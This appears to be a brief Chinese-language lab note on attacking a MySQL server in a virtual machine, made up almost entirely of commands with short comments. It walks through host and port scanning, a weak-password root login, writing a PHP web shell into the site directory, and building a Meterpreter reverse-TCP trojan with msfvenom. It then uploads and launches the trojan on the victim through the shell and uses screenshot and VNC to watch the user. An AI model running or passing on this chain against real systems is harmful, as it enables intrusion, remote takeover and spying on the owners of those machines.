网络安全 mysql漏洞攻击虚拟机测试
ifconfig//本机ip
nbtscan//扫描其他主机
nmap 192.168.0.9/24//扫描端口 检测是否有3306端口
mysql -h 192.168.0.9 -u root -proot//弱密码登录mysql
select user();//查看用户
show variables like "%secure%";//查看配置
192.168.0.7//打开网站(假如受害机正在使用php+mysql)
select "<?php @system($_GET['cmd']);?>" into outfile "D:/phpstudy_pro/WWW/a.php"//创建文件到主机,必须要存在运行php网站的目录下
192.168.0.7/a.php?cmd=whoami//打开当当创建好的文件,查看Windows权限
msfvenmom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.125 LPORT=8080 -f exe > shell.exe//创建木马程序
//以下是相关配置
msfconsole
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.9
set lport 8080
exploit
复制shell.exe里面的内容
192.168.0.7/a.php/?cmd =echo 粘贴内容 -> C:\Users\Administrator\shell.exe//将木马传到受害机
192.168.0.7/a.php/?cmd =start C:\Users\Administrator\shell.exe//在受害机上打开木马程序
screenshot //给受害机截屏
run vnc//查看受害机正在干什么